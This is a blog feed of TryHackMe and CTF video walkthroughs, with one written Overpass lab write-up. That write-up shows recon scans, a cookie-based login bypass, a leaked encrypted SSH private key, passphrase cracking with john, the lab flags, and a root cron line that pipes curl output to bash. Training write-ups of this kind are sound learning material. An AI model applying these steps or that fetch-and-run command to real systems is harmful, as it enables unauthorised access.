tag:blogger.com,1999:blog-60035982213860582472024-03-29T10:29:17.105+07:00Script CodeSimple script code is just a scratch of code that every body can update or modify.Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.comBlogger45125tag:blogger.com,1999:blog-6003598221386058247.post-67858089453165952422024-01-30T16:25:00.001+07:002024-01-30T16:25:12.999+07:00Tryhackme - Daily Smugle [ offensive pentesting ]<iframe width="480" height="270" src="https://youtube.com/embed/i9OisOO9ExQ?si=bTlEZXtfRTpGaAu0" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-626684040056640262024-01-23T01:53:00.001+07:002024-01-23T01:53:23.965+07:00TryHackMe - Credential Harvesting (Bahasa Indonesia)<iframe width="480" height="270" src="https://youtube.com/embed/StUy91how6Y?si=SzPNuYA3aKW4iwNG" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-86805720327684619222024-01-18T18:14:00.001+07:002024-01-18T18:14:47.107+07:00TryHackMe - Server Side Request Forgery (SSRF)<iframe width="480" height="270" src="https://youtube.com/embed/6nt8d32p4Ts?si=kZe_73YkMw8bR749" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-40909518304675177792024-01-15T15:10:00.001+07:002024-01-15T15:10:58.261+07:00Tryhackme Breaching Active Directory (Bahasa Indonesia)<iframe width="480" height="270" src="https://youtube.com/embed/EGzGO21f9lI?si=g47cJ2IYP0q_ZZen" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-10434783683595100202024-01-12T10:32:00.000+07:002024-01-12T10:32:37.100+07:00TryHackMe - Windows Privilege Escalation | Jr Penetration Tester Learnin...<iframe width="480" height="270" src="https://youtube.com/embed/p_lSV8O3YoA?si=HnC80VhaUyM0hZqq" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-19944351518760570902024-01-09T10:36:00.001+07:002024-01-09T10:36:14.960+07:00TryHackMe - Complete Beginner Path - [ Kenobi - Steel Mountain ] (Bahas...<iframe width="480" height="270" src="https://youtube.com/embed/ouCDDDSGDMk?si=pEVvtIXw7Nw7quw1" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-74994132356863587292024-01-05T09:13:00.001+07:002024-01-05T09:13:41.413+07:00TryHackMe Pickle Rick - Web Fundamental Learning Path<iframe width="480" height="270" src="https://youtube.com/embed/BRn-xFlF4C8?si=Xr93uFMHqX1OJjlr" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-9501482062654270962024-01-03T18:46:00.000+07:002024-01-03T18:46:01.593+07:00Tryhackme - Advent of cyber 2023 Side Quest 4 | The Return of The Yeti ...<iframe width="480" height="270" src="https://youtube.com/embed/iTGxZss1sIs?si=nY3bsgiD9i-4X7U-" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-10201014232780941792023-12-31T11:36:00.001+07:002023-12-31T11:36:18.767+07:00Tryhackme Side Quest 3 - Frosteau Busy with Vim<iframe width="480" height="270" src="https://youtube.com/embed/PnOFCPgGAsM?si=3ScRkvVCkCY9BSfb" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-88797648355307790462023-12-28T16:56:00.001+07:002023-12-28T16:56:41.215+07:00Tryhackme #Vulnversity Room<iframe width="480" height="270" src="https://youtube.com/embed/SK1Do0KxQkw?si=HSjYDdkWOc3lSoHK" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-83610762239545875082023-12-22T12:05:00.001+07:002023-12-22T12:05:31.677+07:00TryHackMe Advent of Cyber 2023 #day20 DevSecOps | Advent of Frostlings (...<iframe width="480" height="270" src="https://youtube.com/embed/GfgJ6EOqmao?si=rPv-5A3h9dDmROe5" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-49830324289372698702023-12-22T00:53:00.001+07:002023-12-22T00:53:18.481+07:00TryHackMe Advent of Cyber 2023 #day19 Memory Forensics (Bahasa Indonesia)<iframe width="480" height="270" src="https://youtube.com/embed/e-5e5altzpI?si=YUp9A7vrn8lcsqTZ" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-26471014492007830702023-12-21T17:48:00.001+07:002023-12-21T17:48:33.202+07:00TryHackMe Advent of Cyber 2023 #day18 Eradication (Bahasa Indonesia)<iframe width="480" height="270" src="https://youtube.com/embed/89K_9x3UrXU?si=o6hpWXm_qsx5F3QW" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-84373530616611701562023-12-20T14:49:00.001+07:002023-12-20T14:49:41.095+07:00TryHackMe Advent of Cyber 2023 #Day17 Traffic Analysis (Bahasa Indonesia)<iframe width="480" height="270" src="https://youtube.com/embed/DFmlISGYNVo?si=9b9cX0FnxxsNeDVS" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-33872218999461509152023-12-19T10:43:00.001+07:002023-12-19T10:43:22.922+07:00TryHackMe Advent of Cyber 2023 #day13 #day14 #day15 | Machine Learning<iframe width="480" height="270" src="https://youtube.com/embed/FbbdAC-E21U?si=WEiqpxbCBs-mq9Jv" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-35866275812551978712023-12-14T07:27:00.000+07:002023-12-14T07:27:18.669+07:00TryHackMe Advent of Cyber 2023 #day12 Defence in Depth (Bahasa Indonesia)<iframe width="480" height="270" src="https://youtube.com/embed/g7BY_Vj-qBU?si=a7HDnxlrzs1p3gb0" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-20633784838968975032023-12-14T06:46:00.001+07:002023-12-14T06:46:10.873+07:00TryHackMe Advent of Cyber 2023 #day11 - Active Directory (Bahasa Indonesia)<iframe width="480" height="270" src="https://youtube.com/embed/JtJ6VWsEkqk?si=qegea8CegTg2m8uM" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-24207602867782333852023-12-13T12:52:00.001+07:002023-12-13T12:52:47.056+07:00TryHackMe Advent of Cyber 2023 #Day10 - SQLInjection<iframe width="480" height="270" src="https://youtube.com/embed/NIAZTr2aPFY?si=mcs_XNNIvJET5vV0" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-91291309677653561422023-12-11T13:50:00.001+07:002023-12-11T13:50:13.567+07:00TryHackMe Advent of Cyber 2023 | #Day8 - Disk Forensics, Have a Holly Jo...<iframe width="480" height="270" src="https://youtube.com/embed/-OY3B8E2CGU?si=_HmMVpGBPismXuGG" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-75952056164256884542023-11-23T15:17:00.000+07:002023-11-23T15:17:02.638+07:00TryHackMe Wonderland (Bahasa Indonesia)<iframe width="480" height="270" src="https://youtube.com/embed/b3tdFZ2lI5U?si=MaZ_lsZPikdV-9z6" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-82032621442968426172023-10-20T08:29:00.000+07:002023-10-20T08:29:29.258+07:00Try Hack Me Practice on Overpass<iframe frameborder="0" height="270" src="https://youtube.com/embed/jAgbJFn0k2U?si=g8zIlpKJ2SNT0UCs" width="480"></iframe><div><br /></div><div><br /></div><div><div style="line-height: 18px;"><div># Overpass Tray Hack Me<br /><br />> Hack the machine and get the flag in user.txt<br />```thm{65c1aaf000506e56996822c6281e6bf7}```<br />> Escalate your privileges and get the flag in root.txt<br />```thm{7f336f8c359dbac18d54fdd64ea753bb}```<br /><br /># Writeups<br />- `nmap -sC -sV 10.10.48.29 > nmap_overpass`<br />- `gobuster dir -u "http://10.10.48.29/" -w ~/HackTools/directory-list-2.3-medium.txt -x php,html,txt`<br /><br />```bash<br />===============================================================<br />Gobuster v3.5<br />by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)<br />===============================================================<br />[+] Url: http://10.10.48.29/<br />[+] Method: GET<br />[+] Threads: 10<br />[+] Wordlist: /Users/hengkisirait/HackTools/directory-list-2.3-medium.txt<br />[+] Negative Status codes: 404<br />[+] User Agent: gobuster/3.5<br />[+] Extensions: txt,php,html<br />[+] Timeout: 10s<br />===============================================================<br />2023/10/19 22:08:02 Starting gobuster in directory enumeration mode<br />===============================================================<br />/index.html (Status: 301) [Size: 0] [--> ./]<br />/img (Status: 301) [Size: 0] [--> img/]<br />/downloads (Status: 301) [Size: 0] [--> downloads/]<br />/aboutus (Status: 301) [Size: 0] [--> aboutus/]<br />/admin (Status: 301) [Size: 42] [--> /admin/]<br />/admin.html (Status: 200) [Size: 1525]<br />```<br /><br />- Inspect Element check `login.js`<br />- Set Cookie with name `SessionToken` and refresh the page so we get the id rsa<br /><br />```<br />-----BEGIN RSA PRIVATE KEY-----<br />Proc-Type: 4,ENCRYPTED<br />DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337<br /><br />LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN<br />JHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal<br />73/eUN9kYF0ua9rZC6mwoI2iG6sdlNL4ZqsYY7rrvDxeCZJkgzQGzkB9wKgw1ljT<br />WDyy8qncljugOIf8QrHoo30Gv+dAMfipTSR43FGBZ/Hha4jDykUXP0PvuFyTbVdv<br />BMXmr3xuKkB6I6k/jLjqWcLrhPWS0qRJ718G/u8cqYX3oJmM0Oo3jgoXYXxewGSZ<br />AL5bLQFhZJNGoZ+N5nHOll1OBl1tmsUIRwYK7wT/9kvUiL3rhkBURhVIbj2qiHxR<br />3KwmS4Dm4AOtoPTIAmVyaKmCWopf6le1+wzZ/UprNCAgeGTlZKX/joruW7ZJuAUf<br />ABbRLLwFVPMgahrBp6vRfNECSxztbFmXPoVwvWRQ98Z+p8MiOoReb7Jfusy6GvZk<br />VfW2gpmkAr8yDQynUukoWexPeDHWiSlg1kRJKrQP7GCupvW/r/Yc1RmNTfzT5eeR<br />OkUOTMqmd3Lj07yELyavlBHrz5FJvzPM3rimRwEsl8GH111D4L5rAKVcusdFcg8P<br />9BQukWbzVZHbaQtAGVGy0FKJv1WhA+pjTLqwU+c15WF7ENb3Dm5qdUoSSlPzRjze<br />eaPG5O4U9Fq0ZaYPkMlyJCzRVp43De4KKkyO5FQ+xSxce3FW0b63+8REgYirOGcZ<br />4TBApY+uz34JXe8jElhrKV9xw/7zG2LokKMnljG2YFIApr99nZFVZs1XOFCCkcM8<br />GFheoT4yFwrXhU1fjQjW/cR0kbhOv7RfV5x7L36x3ZuCfBdlWkt/h2M5nowjcbYn<br />exxOuOdqdazTjrXOyRNyOtYF9WPLhLRHapBAkXzvNSOERB3TJca8ydbKsyasdCGy<br />AIPX52bioBlDhg8DmPApR1C1zRYwT1LEFKt7KKAaogbw3G5raSzB54MQpX6WL+wk<br />6p7/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58<br />dPm51MekHD+WeP8oTYGI4PVCS/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i<br />n0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT<br />8HiUKTEsukcv/IYHK1s+Uw/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K<br />4FMg3ng0e4/7HRYJSaXLQOKeNwcf/LW5dipO7DmBjVLsC8eyJ8ujeutP/GcA5l6z<br />ylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS<br />49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2<br />+hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk<br />2cWk/Mln7+OhAApAvDBKVM7/LGR9/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7<br />-----END RSA PRIVATE KEY-----<br />```<br /><br />> Crack the passphrase <br />```bash<br />ssh2john james_id_rsa > james_hash<br />john james_hash --wordlist=/usr/share/wordlists/rockyou.txt<br />james_id_rsa:james13<br />1 password hash cracked, 0 left<br />```<br /><br />> ssh to overpass-prod `ssh -i james_id_rsa james@10.10.48.29`<br />> use the passphrase that we got from john<br />> check file user.txt as answer<br /><br />> check using `linpeas.sh` `* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash`</div></div></div>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-44375017774891043442023-10-20T04:51:00.000+07:002023-10-20T04:51:57.291+07:00PicoCTF Hide Me Category Forensic<iframe width="480" height="270" src="https://youtube.com/embed/VhW9JSZQ9Fk?si=VCGmx60_WZ-Hn-pJ" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-89573771569550888872023-08-16T12:50:00.001+07:002023-08-16T12:50:14.901+07:00Escape CTF at Korea 2023 category misc<iframe width="480" height="270" src="https://youtube.com/embed/6TB8hK94h5U" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-62821327071427826402023-08-01T15:17:00.000+07:002023-08-01T15:17:15.625+07:00Pico CTF Vault Door - Java Computer Programming<iframe width="480" height="270" src="https://youtube.com/embed/lq0N6KomNGA" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0tag:blogger.com,1999:blog-6003598221386058247.post-43577300687885957442023-07-25T20:03:00.001+07:002023-07-25T20:03:42.722+07:00BDSec 2023 CTF What is this ? MISC Category<iframe width="480" height="270" src="https://youtube.com/embed/fGVaMDWWl7g" frameborder="0"></iframe>Hengkihttp://www.blogger.com/profile/10288447657360236497noreply@blogger.com0